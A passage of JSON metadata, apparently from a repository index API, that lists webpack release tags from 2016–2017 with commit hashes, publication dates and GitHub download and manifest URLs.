2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webp